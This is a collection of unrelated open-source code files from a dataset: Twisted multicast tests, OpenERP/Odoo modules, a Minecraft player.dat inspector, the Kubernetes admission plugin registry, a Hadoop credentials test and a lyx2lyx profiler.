def test_loopback(self):
"""
Test that after loopback mode has been set, multicast packets are
delivered to their sender.
"""
self.assertEqual(self.server.transport.getLoopbackMode(), 1)
addr = self.server.transport.getHost()
joined = self.server.transport.joinGroup("225.0.0.250")
def cbJoined(ignored):
d = self.server.packetReceived = Deferred()
self.server.transport.write("hello", ("225.0.0.250", addr.port))
return d
joined.addCallback(cbJoined)
def cbPacket(ignored):
self.assertEqual(len(self.server.packets), 1)
self.server.transport.setLoopbackMode(0)
self.assertEqual(self.server.transport.getLoopbackMode(), 0)
self.server.transport.write("hello", ("225.0.0.250", addr.port))
# This is fairly lame.
d = Deferred()
reactor.callLater(0, d.callback, None)
return d
joined.addCallback(cbPacket)
def cbNoPacket(ignored):
self.assertEqual(len(self.server.packets), 1)
joined.addCallback(cbNoPacket)
return joined
def test_interface(self):
"""
Test C{getOutgoingInterface} and C{setOutgoingInterface}.
"""
self.assertEqual(
self.client.transport.getOutgoingInterface(), "0.0.0.0")
self.assertEqual(
self.server.transport.getOutgoingInterface(), "0.0.0.0")
d1 = self.client.transport.setOutgoingInterface("127.0.0.1")
d2 = self.server.transport.setOutgoingInterface("127.0.0.1")
result = gatherResults([d1, d2])
def cbInterfaces(ignored):
self.assertEqual(
self.client.transport.getOutgoingInterface(), "127.0.0.1")
self.assertEqual(
self.server.transport.getOutgoingInterface(), "127.0.0.1")
result.addCallback(cbInterfaces)
return result
def test_joinLeave(self):
"""
Test that multicast a group can be joined and left.
"""
d = self.client.transport.joinGroup("225.0.0.250")
def clientJoined(ignored):
return self.client.transport.leaveGroup("225.0.0.250")
d.addCallback(clientJoined)
def clientLeft(ignored):
return self.server.transport.joinGroup("225.0.0.250")
d.addCallback(clientLeft)
def serverJoined(ignored):
return self.server.transport.leaveGroup("225.0.0.250")
d.addCallback(serverJoined)
return d
def test_joinFailure(self):
"""
Test that an attempt to join an address which is not a multicast
address fails with L{error.MulticastJoinError}.
"""
# 127.0.0.1 is not a multicast address, so joining it should fail.
return self.assertFailure(
self.client.transport.joinGroup("127.0.0.1"),
error.MulticastJoinError)
if runtime.platform.isWindows() and not runtime.platform.isVista():
test_joinFailure.todo = "Windows' multicast is wonky"
def test_multicast(self):
"""
Test that a multicast group can be joined and messages sent to and
received from it.
"""
c = Server()
p = reactor.listenMulticast(0, c)
addr = self.server.transport.getHost()
joined = self.server.transport.joinGroup("225.0.0.250")
def cbJoined(ignored):
d = self.server.packetReceived = Deferred()
c.transport.write("hello world", ("225.0.0.250", addr.port))
return d
joined.addCallback(cbJoined)
def cbPacket(ignored):
self.assertEqual(self.server.packets[0][0], "hello world")
joined.addCallback(cbPacket)
def cleanup(passthrough):
result = maybeDeferred(p.stopListening)
result.addCallback(lambda ign: passthrough)
return result
joined.addCallback(cleanup)
return joined
def test_multiListen(self):
"""
Test that multiple sockets can listen on the same multicast port and
that they both receive multicast messages directed to that address.
"""
firstClient = Server()
firstPort = reactor.listenMulticast(
0, firstClient, listenMultiple=True)
portno = firstPort.getHost().port
secondClient = Server()
secondPort = reactor.listenMulticast(
portno, secondClient, listenMultiple=True)
theGroup = "225.0.0.250"
joined = gatherResults([self.server.transport.joinGroup(theGroup),
firstPort.joinGroup(theGroup),
secondPort.joinGroup(theGroup)])
def serverJoined(ignored):
d1 = firstClient.packetReceived = Deferred()
d2 = secondClient.packetReceived = Deferred()
firstClient.transport.write("hello world", (theGroup, portno))
return gatherResults([d1, d2])
joined.addCallback(serverJoined)
def gotPackets(ignored):
self.assertEqual(firstClient.packets[0][0], "hello world")
self.assertEqual(secondClient.packets[0][0], "hello world")
joined.addCallback(gotPackets)
def cleanup(passthrough):
result = gatherResults([
maybeDeferred(firstPort.stopListening),
maybeDeferred(secondPort.stopListening)])
result.addCallback(lambda ign: passthrough)
return result
joined.addBoth(cleanup)
return joined
if runtime.platform.isWindows():
test_multiListen.skip = ("on non-linux platforms it appears multiple "
"processes can listen, but not multiple sockets "
"in same process?")
if not interfaces.IReactorUDP(reactor, None):
UDPTestCase.skip = "This reactor does not support UDP"
ReactorShutdownInteraction.skip = "This reactor does not support UDP"
if not interfaces.IReactorMulticast(reactor, None):
MulticastTestCase.skip = "This reactor does not support multicast"
def checkForLinux22():
import os
if os.path.exists("/proc/version"):
s = open("/proc/version").read()
if s.startswith("Linux version"):
s = s.split()[2]
if s.split(".")[:2] == ["2", "2"]:
f = MulticastTestCase.testInterface.im_func
f.todo = "figure out why this fails in linux 2.2"
checkForLinux22() | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
# Copyright (C) 2010-2012 OpenERP s.a. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" Modules (also called addons) management.
"""
from . import db, graph, loading, migration, module, registry
from openerp.modules.loading import load_modules
from openerp.modules.module import get_modules, get_modules_with_version, \
load_information_from_description_file, get_module_resource, get_module_path, \
initialize_sys_path, load_openerp_module, init_module_models, adapt_version
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python3
"""
Very basic player.dat inspection script
"""
import os
import sys
import argparse
from pathlib import Path
# incantation to be able to import overviewer_core
if not hasattr(sys, "frozen"):
sys.path.insert(0, os.path.abspath(os.path.join(os.path.split(__file__)[0], '..')))
from overviewer_core.nbt import load
from overviewer_core import items
def print_player(data, sub_entry=False):
indent = ""
if sub_entry:
indent = "\t"
print("%sPosition:\t%i, %i, %i\t(dim: %i)"
% (indent, data['Pos'][0], data['Pos'][1], data['Pos'][2], data['Dimension']))
try:
print("%sSpawn:\t\t%i, %i, %i"
% (indent, data['SpawnX'], data['SpawnY'], data['SpawnZ']))
except KeyError:
pass
print("%sHealth:\t%i\tLevel:\t\t%i\t\tGameType:\t%i"
% (indent, data['Health'], data['XpLevel'], data['playerGameType']))
print("%sFood:\t%i\tTotal XP:\t%i"
% (indent, data['foodLevel'], data['XpTotal']))
print("%sInventory: %d items" % (indent, len(data['Inventory'])))
if not sub_entry:
for item in data['Inventory']:
print(" %-3d %s" % (item['Count'], items.id2item(item['id'])))
def find_all_player_files(dir_path):
for player_file in dir_path.iterdir():
player = player_file.stem
yield player_file, player
def find_player_file(dir_path, selected_player):
for player_file, player in find_all_player_files(dir_path):
if selected_player == player:
return player_file, player
raise FileNotFoundError()
def load_and_output_player(player_file_path, player, sub_entry=False):
with player_file_path.open('rb') as f:
player_data = load(f)[1]
print("")
print(player)
print_player(player_data, sub_entry=sub_entry)
def dir_or_file(path):
p = Path(path)
if not p.is_file() and not p.is_dir():
raise argparse.ArgumentTypeError("Not a valid file or directory path")
return p
def main(path, selected_player=None):
print("Inspecting %s" % args.path)
if not path.is_dir():
load_and_output_player(args.path)
return
if selected_player is None:
for player_file, player in find_all_player_files(args.path):
load_and_output_player(player_file, player)
return
try:
player_file, player = find_player_file(args.path, args.selected_player)
load_and_output_player(player_file, player, sub_entry=True)
except FileNotFoundError:
print("No %s.dat in %s" % (args.selected_player, args.path))
sys.exit(1)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('path', metavar='<Player.dat or directory>', type=dir_or_file)
parser.add_argument('selected_player', nargs='?', default=None)
args = parser.parse_args()
main(args.path, selected_player=args.selected_player) | unknown | codeparrot/codeparrot-clean | ||
/*
Copyright 2014 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package options
// This file exists to force the desired plugin implementations to be linked.
// This should probably be part of some configuration fed into the build for a
// given binary target.
import (
"github.com/spf13/pflag"
mutatingadmissionpolicy "k8s.io/apiserver/pkg/admission/plugin/policy/mutating"
validatingadmissionpolicy "k8s.io/apiserver/pkg/admission/plugin/policy/validating"
// Admission policies
"k8s.io/kubernetes/plugin/pkg/admission/admit"
"k8s.io/kubernetes/plugin/pkg/admission/alwayspullimages"
"k8s.io/kubernetes/plugin/pkg/admission/antiaffinity"
certapproval "k8s.io/kubernetes/plugin/pkg/admission/certificates/approval"
"k8s.io/kubernetes/plugin/pkg/admission/certificates/ctbattest"
certsigning "k8s.io/kubernetes/plugin/pkg/admission/certificates/signing"
certsubjectrestriction "k8s.io/kubernetes/plugin/pkg/admission/certificates/subjectrestriction"
"k8s.io/kubernetes/plugin/pkg/admission/defaulttolerationseconds"
"k8s.io/kubernetes/plugin/pkg/admission/deny"
"k8s.io/kubernetes/plugin/pkg/admission/eventratelimit"
"k8s.io/kubernetes/plugin/pkg/admission/extendedresourcetoleration"
"k8s.io/kubernetes/plugin/pkg/admission/gc"
"k8s.io/kubernetes/plugin/pkg/admission/imagepolicy"
"k8s.io/kubernetes/plugin/pkg/admission/limitranger"
"k8s.io/kubernetes/plugin/pkg/admission/namespace/autoprovision"
"k8s.io/kubernetes/plugin/pkg/admission/namespace/exists"
"k8s.io/kubernetes/plugin/pkg/admission/network/defaultingressclass"
"k8s.io/kubernetes/plugin/pkg/admission/network/denyserviceexternalips"
"k8s.io/kubernetes/plugin/pkg/admission/nodedeclaredfeatures"
"k8s.io/kubernetes/plugin/pkg/admission/noderestriction"
"k8s.io/kubernetes/plugin/pkg/admission/nodetaint"
"k8s.io/kubernetes/plugin/pkg/admission/podnodeselector"
"k8s.io/kubernetes/plugin/pkg/admission/podtolerationrestriction"
"k8s.io/kubernetes/plugin/pkg/admission/podtopologylabels"
podpriority "k8s.io/kubernetes/plugin/pkg/admission/priority"
"k8s.io/kubernetes/plugin/pkg/admission/runtimeclass"
"k8s.io/kubernetes/plugin/pkg/admission/security/podsecurity"
"k8s.io/kubernetes/plugin/pkg/admission/serviceaccount"
"k8s.io/kubernetes/plugin/pkg/admission/storage/persistentvolume/resize"
"k8s.io/kubernetes/plugin/pkg/admission/storage/storageclass/setdefault"
"k8s.io/kubernetes/plugin/pkg/admission/storage/storageobjectinuseprotection"
"k8s.io/apimachinery/pkg/util/sets"
"k8s.io/apiserver/pkg/admission"
"k8s.io/apiserver/pkg/admission/plugin/namespace/lifecycle"
"k8s.io/apiserver/pkg/admission/plugin/resourcequota"
mutatingwebhook "k8s.io/apiserver/pkg/admission/plugin/webhook/mutating"
validatingwebhook "k8s.io/apiserver/pkg/admission/plugin/webhook/validating"
)
// AllOrderedPlugins is the list of all the plugins in order.
var AllOrderedPlugins = []string{
admit.PluginName, // AlwaysAdmit
autoprovision.PluginName, // NamespaceAutoProvision
lifecycle.PluginName, // NamespaceLifecycle
exists.PluginName, // NamespaceExists
antiaffinity.PluginName, // LimitPodHardAntiAffinityTopology
limitranger.PluginName, // LimitRanger
serviceaccount.PluginName, // ServiceAccount
noderestriction.PluginName, // NodeRestriction
nodetaint.PluginName, // TaintNodesByCondition
alwayspullimages.PluginName, // AlwaysPullImages
imagepolicy.PluginName, // ImagePolicyWebhook
podsecurity.PluginName, // PodSecurity
podnodeselector.PluginName, // PodNodeSelector
podpriority.PluginName, // Priority
defaulttolerationseconds.PluginName, // DefaultTolerationSeconds
podtolerationrestriction.PluginName, // PodTolerationRestriction
eventratelimit.PluginName, // EventRateLimit
extendedresourcetoleration.PluginName, // ExtendedResourceToleration
setdefault.PluginName, // DefaultStorageClass
storageobjectinuseprotection.PluginName, // StorageObjectInUseProtection
gc.PluginName, // OwnerReferencesPermissionEnforcement
resize.PluginName, // PersistentVolumeClaimResize
runtimeclass.PluginName, // RuntimeClass
certapproval.PluginName, // CertificateApproval
certsigning.PluginName, // CertificateSigning
ctbattest.PluginName, // ClusterTrustBundleAttest
certsubjectrestriction.PluginName, // CertificateSubjectRestriction
defaultingressclass.PluginName, // DefaultIngressClass
denyserviceexternalips.PluginName, // DenyServiceExternalIPs
podtopologylabels.PluginName, // PodTopologyLabels
nodedeclaredfeatures.PluginName, // NodeDeclaredFeatureValidator
// new admission plugins should generally be inserted above here
// webhook, resourcequota, and deny plugins must go at the end
mutatingadmissionpolicy.PluginName, // MutatingAdmissionPolicy
mutatingwebhook.PluginName, // MutatingAdmissionWebhook
validatingadmissionpolicy.PluginName, // ValidatingAdmissionPolicy
validatingwebhook.PluginName, // ValidatingAdmissionWebhook
resourcequota.PluginName, // ResourceQuota
deny.PluginName, // AlwaysDeny
}
// registerAllAdmissionPluginFlags registers legacy CLI flag options for admission plugins.
// No new plugins should use CLI flags to configure themselves.
func registerAllAdmissionPluginFlags(fs *pflag.FlagSet) {
defaulttolerationseconds.RegisterFlags(fs)
}
// RegisterAllAdmissionPlugins registers all admission plugins.
// The order of registration is irrelevant, see AllOrderedPlugins for execution order.
func RegisterAllAdmissionPlugins(plugins *admission.Plugins) {
admit.Register(plugins) // DEPRECATED as no real meaning
alwayspullimages.Register(plugins)
antiaffinity.Register(plugins)
defaulttolerationseconds.Register(plugins)
defaultingressclass.Register(plugins)
denyserviceexternalips.Register(plugins)
deny.Register(plugins) // DEPRECATED as no real meaning
eventratelimit.Register(plugins)
extendedresourcetoleration.Register(plugins)
gc.Register(plugins)
imagepolicy.Register(plugins)
limitranger.Register(plugins)
autoprovision.Register(plugins)
exists.Register(plugins)
noderestriction.Register(plugins)
nodetaint.Register(plugins)
podnodeselector.Register(plugins)
podtolerationrestriction.Register(plugins)
runtimeclass.Register(plugins)
resourcequota.Register(plugins)
podsecurity.Register(plugins)
podpriority.Register(plugins)
serviceaccount.Register(plugins)
setdefault.Register(plugins)
resize.Register(plugins)
storageobjectinuseprotection.Register(plugins)
certapproval.Register(plugins)
certsigning.Register(plugins)
ctbattest.Register(plugins)
certsubjectrestriction.Register(plugins)
podtopologylabels.Register(plugins)
nodedeclaredfeatures.Register(plugins)
}
// DefaultOffAdmissionPlugins get admission plugins off by default for kube-apiserver.
func DefaultOffAdmissionPlugins() sets.Set[string] {
defaultOnPlugins := sets.New(
lifecycle.PluginName, // NamespaceLifecycle
limitranger.PluginName, // LimitRanger
serviceaccount.PluginName, // ServiceAccount
setdefault.PluginName, // DefaultStorageClass
resize.PluginName, // PersistentVolumeClaimResize
defaulttolerationseconds.PluginName, // DefaultTolerationSeconds
mutatingwebhook.PluginName, // MutatingAdmissionWebhook
validatingwebhook.PluginName, // ValidatingAdmissionWebhook
resourcequota.PluginName, // ResourceQuota
storageobjectinuseprotection.PluginName, // StorageObjectInUseProtection
podpriority.PluginName, // Priority
nodetaint.PluginName, // TaintNodesByCondition
runtimeclass.PluginName, // RuntimeClass
certapproval.PluginName, // CertificateApproval
certsigning.PluginName, // CertificateSigning
ctbattest.PluginName, // ClusterTrustBundleAttest
certsubjectrestriction.PluginName, // CertificateSubjectRestriction
defaultingressclass.PluginName, // DefaultIngressClass
podsecurity.PluginName, // PodSecurity
podtopologylabels.PluginName, // PodTopologyLabels, only active when feature gate PodTopologyLabelsAdmission is enabled.
mutatingadmissionpolicy.PluginName, // Mutatingadmissionpolicy, only active when feature gate MutatingAdmissionpolicy is enabled
validatingadmissionpolicy.PluginName, // ValidatingAdmissionPolicy, only active when feature gate ValidatingAdmissionPolicy is enabled
nodedeclaredfeatures.PluginName, // NodeDeclaredFeatureValidator, only active when feature gate NodeDeclaredFeatures is enabled
)
return sets.New(AllOrderedPlugins...).Difference(defaultOnPlugins)
} | go | github | https://github.com/kubernetes/kubernetes | pkg/kubeapiserver/options/plugins.go |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.fs.tosfs.object.tos.auth;
import com.volcengine.tos.auth.Credential;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.tosfs.conf.TosKeys;
import org.junit.jupiter.api.Test;
import static org.junit.jupiter.api.Assertions.assertEquals;
public class TestSimpleCredentialsProvider extends TestAbstractCredentialsProvider {
@Test
public void testStaticCredentials() {
Configuration conf = new Configuration();
conf.set(TosKeys.FS_TOS_ACCESS_KEY_ID, "ACCESS_KEY");
conf.set(TosKeys.FS_TOS_SECRET_ACCESS_KEY, "SECRET_KEY");
conf.set(TosKeys.FS_TOS_SESSION_TOKEN, "STS_TOKEN");
SimpleCredentialsProvider provider = new SimpleCredentialsProvider();
provider.initialize(conf, "test");
Credential credentials = provider.credential();
assertEquals("ACCESS_KEY", credentials.getAccessKeyId(), "access key must be ACCESS_KEY");
assertEquals("SECRET_KEY", credentials.getAccessKeySecret(), "secret key must be SECRET_KEY");
assertEquals("STS_TOKEN", credentials.getSecurityToken(), "sts token must be STS_TOKEN");
}
@Test
public void testStaticCredentialsWithBucket() {
Configuration conf = new Configuration();
conf.set(TosKeys.FS_TOS_BUCKET_ACCESS_KEY_ID.key("test"), "ACCESS_KEY");
conf.set(TosKeys.FS_TOS_BUCKET_SECRET_ACCESS_KEY.key("test"), "SECRET_KEY");
conf.set(TosKeys.FS_TOS_BUCKET_SESSION_TOKEN.key("test"), "STS_TOKEN");
SimpleCredentialsProvider provider = new SimpleCredentialsProvider();
provider.initialize(conf, "test");
Credential credentials = provider.credential();
assertEquals("ACCESS_KEY", credentials.getAccessKeyId(), "access key must be ACCESS_KEY");
assertEquals("SECRET_KEY", credentials.getAccessKeySecret(), "secret key must be SECRET_KEY");
assertEquals("STS_TOKEN", credentials.getSecurityToken(), "sts token must be STS_TOKEN");
}
@Test
public void testStaticCredentialsWithPriority() {
Configuration conf = new Configuration();
conf.set(TosKeys.FS_TOS_ACCESS_KEY_ID, "ACCESS_KEY");
conf.set(TosKeys.FS_TOS_SECRET_ACCESS_KEY, "SECRET_KEY");
conf.set(TosKeys.FS_TOS_SESSION_TOKEN, "STS_TOKEN");
conf.set(TosKeys.FS_TOS_BUCKET_ACCESS_KEY_ID.key("test"), "ACCESS_KEY_BUCKET");
conf.set(TosKeys.FS_TOS_BUCKET_SECRET_ACCESS_KEY.key("test"), "SECRET_KEY_BUCKET");
conf.set(TosKeys.FS_TOS_BUCKET_SESSION_TOKEN.key("test"), "STS_TOKEN_BUCKET");
SimpleCredentialsProvider provider = new SimpleCredentialsProvider();
provider.initialize(conf, "test");
Credential credentials = provider.credential();
assertEquals("ACCESS_KEY_BUCKET", credentials.getAccessKeyId(),
"access key must be ACCESS_KEY_BUCKET");
assertEquals("SECRET_KEY_BUCKET", credentials.getAccessKeySecret(),
"secret key must be SECRET_KEY_BUCKET");
assertEquals("STS_TOKEN_BUCKET", credentials.getSecurityToken(),
"sts token must be STS_TOKEN_BUCKET");
}
} | java | github | https://github.com/apache/hadoop | hadoop-cloud-storage-project/hadoop-tos/src/test/java/org/apache/hadoop/fs/tosfs/object/tos/auth/TestSimpleCredentialsProvider.java |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2004 José Matos <jamatos@lyx.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# We need all this because lyx2lyx does not have the .py termination
import imp
lyx2lyx = imp.load_source("lyx2lyx", "lyx2lyx", open("lyx2lyx"))
# Profiler used in the study
import hotshot, hotshot.stats
import sys
import os
"""
This program profiles lyx2lyx.
Usage:
./profiling.py option_to_lyx2lyx
Example:
./profiling.py -ou.lyx ../doc/UserGuide.lyx
"""
def main():
# This will only work with python >= 2.2, the version where this module was added
prof = hotshot.Profile("lyx2lyx.prof") # Use temporary file, here?
benchtime = prof.runcall(lyx2lyx.main)
prof.close()
# After the tests, show the profile analysis.
stats = hotshot.stats.load("lyx2lyx.prof")
stats.strip_dirs()
stats.sort_stats('time', 'calls')
stats.print_stats(20)
os.unlink("lyx2lyx.prof")
if __name__ == "__main__":
main() | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
'''Define model res.partner.relation'''
##############################################################################
#
# OpenERP, Open Source Management Solution
# This module copyright (C) 2013 Therp BV (<http://therp.nl>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import osv, models, fields, api, exceptions, _
from . import get_partner_type
class ResPartnerRelation(models.Model):
'''Model res.partner.relation is used to describe all links or relations
between partners in the database.
In many parts of the code we have to know whether the active partner is
the left partner, or the right partner. If the active partner is the
right partner we have to show the inverse name.
Because the active partner is crucial for the working of partner
relationships, we make sure on the res.partner model that the partner id
is set in the context where needed.
'''
_name = 'res.partner.relation'
_description = 'Partner relation'
_order = 'active desc, date_start desc, date_end desc'
def _search_any_partner_id(self, operator, value):
return [
'|',
('left_partner_id', operator, value),
('right_partner_id', operator, value),
]
def _get_computed_fields(
self, cr, uid, ids, field_names, arg, context=None):
'''Return a dictionary of dictionaries, with for every partner for
ids, the computed values.'''
def get_values(self, dummy_field_names, dummy_arg, context=None):
'''Get computed values for record'''
values = {}
on_right_partner = self._on_right_partner(self.right_partner_id.id)
# type_selection_id
values['type_selection_id'] = (
((self.type_id.id) * 10) + (on_right_partner and 1 or 0))
# partner_id_display
values['partner_id_display'] = (
self.left_partner_id.id
if on_right_partner
else self.right_partner_id.id
)
return values
return dict([
(i.id, get_values(i, field_names, arg, context=context))
for i in self.browse(cr, uid, ids, context=context)
])
_columns = {
'type_selection_id': osv.fields.function(
_get_computed_fields,
multi="computed_fields",
fnct_inv=lambda *args: None,
type='many2one', obj='res.partner.relation.type.selection',
string='Type',
),
'partner_id_display': osv.fields.function(
_get_computed_fields,
multi="computed_fields",
fnct_inv=lambda *args: None,
type='many2one', obj='res.partner',
string='Partner'
),
}
allow_self = fields.Boolean(related='type_id.allow_self')
left_contact_type = fields.Selection(
lambda s: s.env['res.partner.relation.type']._get_partner_types(),
'Left Partner Type',
compute='_get_partner_type_any',
store=True,
)
right_contact_type = fields.Selection(
lambda s: s.env['res.partner.relation.type']._get_partner_types(),
'Right Partner Type',
compute='_get_partner_type_any',
store=True,
)
any_partner_id = fields.Many2many(
'res.partner',
string='Partner',
compute='_get_partner_type_any',
search='_search_any_partner_id'
)
left_partner_id = fields.Many2one(
'res.partner',
string='Source Partner',
required=True,
auto_join=True,
ondelete='cascade',
)
right_partner_id = fields.Many2one(
'res.partner',
string='Destination Partner',
required=True,
auto_join=True,
ondelete='cascade',
)
type_id = fields.Many2one(
'res.partner.relation.type',
string='Type',
required=True,
auto_join=True,
)
date_start = fields.Date('Starting date')
date_end = fields.Date('Ending date')
active = fields.Boolean('Active', default=True)
@api.one
@api.depends('left_partner_id', 'right_partner_id')
def _get_partner_type_any(self):
self.left_contact_type = get_partner_type(self.left_partner_id)
self.right_contact_type = get_partner_type(self.right_partner_id)
self.any_partner_id = self.left_partner_id + self.right_partner_id
def _on_right_partner(self, cr, uid, right_partner_id, context=None):
'''Determine wether functions are called in a situation where the
active partner is the right partner. Default False!
'''
if (context and 'active_ids' in context and
right_partner_id in context.get('active_ids', [])):
return True
return False
def _correct_vals(self, vals):
"""Fill type and left and right partner id, according to whether
we have a normal relation type or an inverse relation type
"""
vals = vals.copy()
# If type_selection_id ends in 1, it is a reverse relation type
if 'type_selection_id' in vals:
prts_model = self.env['res.partner.relation.type.selection']
type_selection_id = vals['type_selection_id']
(type_id, is_reverse) = (
prts_model.browse(type_selection_id).
get_type_from_selection_id()
)
vals['type_id'] = type_id
if self._context.get('active_id'):
if is_reverse:
vals['right_partner_id'] = self._context['active_id']
else:
vals['left_partner_id'] = self._context['active_id']
if vals.get('partner_id_display'):
if is_reverse:
vals['left_partner_id'] = vals['partner_id_display']
else:
vals['right_partner_id'] = vals['partner_id_display']
if vals.get('other_partner_id'):
if is_reverse:
vals['left_partner_id'] = vals['other_partner_id']
else:
vals['right_partner_id'] = vals['other_partner_id']
del vals['other_partner_id']
if vals.get('contact_type'):
del vals['contact_type']
return vals
@api.multi
def write(self, vals):
"""Override write to correct values, before being stored."""
vals = self._correct_vals(vals)
return super(ResPartnerRelation, self).write(vals)
@api.model
def create(self, vals):
"""Override create to correct values, before being stored."""
vals = self._correct_vals(vals)
return super(ResPartnerRelation, self).create(vals)
def on_change_type_selection_id(
self, cr, uid, dummy_ids, type_selection_id, context=None):
'''Set domain on partner_id_display, when selection a relation type'''
result = {
'domain': {'partner_id_display': []},
'value': {'type_id': False}
}
if not type_selection_id:
return result
prts_model = self.pool['res.partner.relation.type.selection']
type_model = self.pool['res.partner.relation.type']
(type_id, is_reverse) = (
prts_model.get_type_from_selection_id(
cr, uid, type_selection_id)
)
result['value']['type_id'] = type_id
type_obj = type_model.browse(cr, uid, type_id, context=context)
partner_domain = []
check_contact_type = type_obj.contact_type_right
check_partner_category = (
type_obj.partner_category_right and
type_obj.partner_category_right.id
)
if is_reverse:
# partner_id_display is left partner
check_contact_type = type_obj.contact_type_left
check_partner_category = (
type_obj.partner_category_left and
type_obj.partner_category_left.id
)
if check_contact_type == 'c':
partner_domain.append(('is_company', '=', True))
if check_contact_type == 'p':
partner_domain.append(('is_company', '=', False))
if check_partner_category:
partner_domain.append(
('category_id', 'child_of', check_partner_category))
result['domain']['partner_id_display'] = partner_domain
return result
@api.one
@api.constrains('date_start', 'date_end')
def _check_dates(self):
"""End date should not be before start date, if not filled
:raises exceptions.Warning: When constraint is violated
"""
if (self.date_start and self.date_end and
self.date_start > self.date_end):
raise exceptions.Warning(
_('The starting date cannot be after the ending date.')
)
@api.one
@api.constrains('left_partner_id', 'type_id')
def _check_partner_type_left(self):
"""Check left partner for required company or person
:raises exceptions.Warning: When constraint is violated
"""
self._check_partner_type("left")
@api.one
@api.constrains('right_partner_id', 'type_id')
def _check_partner_type_right(self):
"""Check right partner for required company or person
:raises exceptions.Warning: When constraint is violated
"""
self._check_partner_type("right")
@api.one
def _check_partner_type(self, side):
"""Check partner to left or right for required company or person
:param str side: left or right
:raises exceptions.Warning: When constraint is violated
"""
assert side in ['left', 'right']
ptype = getattr(self.type_id, "contact_type_%s" % side)
company = getattr(self, '%s_partner_id' % side).is_company
if (ptype == 'c' and not company) or (ptype == 'p' and company):
raise exceptions.Warning(
_('The %s partner is not applicable for this relation type.') %
side
)
@api.one
@api.constrains('left_partner_id', 'right_partner_id')
def _check_not_with_self(self):
"""Not allowed to link partner to same partner
:raises exceptions.Warning: When constraint is violated
"""
if self.left_partner_id == self.right_partner_id:
if not self.allow_self:
raise exceptions.Warning(
_('Partners cannot have a relation with themselves.')
)
@api.one
@api.constrains('left_partner_id', 'right_partner_id', 'active')
def _check_relation_uniqueness(self):
"""Forbid multiple active relations of the same type between the same
partners
:raises exceptions.Warning: When constraint is violated
"""
if not self.active:
return
domain = [
('type_id', '=', self.type_id.id),
('active', '=', True),
('id', '!=', self.id),
('left_partner_id', '=', self.left_partner_id.id),
('right_partner_id', '=', self.right_partner_id.id),
]
if self.date_start:
domain += ['|', ('date_end', '=', False),
('date_end', '>=', self.date_start)]
if self.date_end:
domain += ['|', ('date_start', '=', False),
('date_start', '<=', self.date_end)]
if self.search(domain):
raise exceptions.Warning(
_('There is already a similar relation with overlapping dates')
)
def get_action_related_partners(self, cr, uid, ids, context=None):
'''return a window action showing a list of partners taking part in the
relations names by ids. Context key 'partner_relations_show_side'
determines if we show 'left' side, 'right' side or 'all' (default)
partners.
If active_model is res.partner.relation.all, left=this and
right=other'''
if context is None:
context = {}
field_names = {}
if context.get('active_model', self._name) == self._name:
field_names = {
'left': ['left'],
'right': ['right'],
'all': ['left', 'right']
}
elif context.get('active_model') == 'res.partner.relation.all':
field_names = {
'left': ['this'],
'right': ['other'],
'all': ['this', 'other']
}
else:
assert False, 'Unknown active_model!'
partner_ids = []
field_names = field_names[
context.get('partner_relations_show_side', 'all')]
field_names = ['%s_partner_id' % n for n in field_names]
for relation in self.pool[context.get('active_model')].read(
cr, uid, ids, context=context, load='_classic_write'):
for name in field_names:
partner_ids.append(relation[name])
return {
'name': _('Related partners'),
'type': 'ir.actions.act_window',
'res_model': 'res.partner',
'domain': [('id', 'in', partner_ids)],
'views': [(False, 'tree'), (False, 'form')],
'view_type': 'form'
} | unknown | codeparrot/codeparrot-clean | ||
